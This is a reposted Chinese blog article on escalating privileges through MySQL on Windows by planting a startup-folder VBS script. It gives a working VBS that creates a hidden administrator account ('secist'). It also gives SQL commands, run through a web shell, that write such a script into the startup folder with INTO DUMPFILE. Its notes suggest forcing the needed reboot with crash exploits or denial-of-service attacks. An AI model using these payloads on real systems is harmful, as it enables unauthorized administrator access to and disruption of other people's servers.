我是靠谱客的博主 孤独秀发,最近开发中收集的这篇文章主要介绍Mysql 开机启动项提权,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

提权原理

利用Mysql,将后门文件写入开机自启动项,同时因为是开机自启动,再写入之后,需要重启目标服务器(这个要求mysql的权限就很高,至少是管理员权限,甚至是system),该实验只能在windows中使用。

提权方式

第一种:如果" C:Documents and SettingsAll Users「开始」菜单程序启动 "目录存在可读写的权限,那么我们可以直接将VBS提权脚本上传到该目录下!

setwsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Setoe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","secist")
od.SetPassword "secist.com"
od.SetInfo
Set of=GetObject(os&"/secist",user)
oe.add os&"/secist"

将以上代码保存为 .vbs 后缀的文件上传即可!

第二种方式:通过大马的MySQL执行功能,利用SQL命令来进行VBS脚本的创建及添加

create table secist(cmd text);
insert into secist values("set wshshell=createobject(""wscript.shell"")");
insert into secist values("a=wshshell.run(""cmd.exe /c net user secist secist.com /add"",0)");
insert into secist values("b=wshshell.run(""cmd.exe /c net localgroup administrators secist /add"",0)");
select * from secist into dumpfile "C:Documents and SettingsAll Users「开始」菜单程序启动secist.vbs";

成功执行以上命令后,只要管理员重启了服务器,我们就可以成功提权了!

相关补充

1、关于重启目标服务器,我们可以利用一些可导致服务器蓝屏的EXP,或者DDoS拒绝服务~

2、上传的目录必须具备可读写的权限

3、调用的 cmd 也必须有足够的权限

 

 

最后

以上就是孤独秀发为你收集整理的Mysql 开机启动项提权的全部内容,希望文章能够帮你解决Mysql 开机启动项提权所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(57)

评论列表共有 0 条评论

立即
投稿
返回
顶部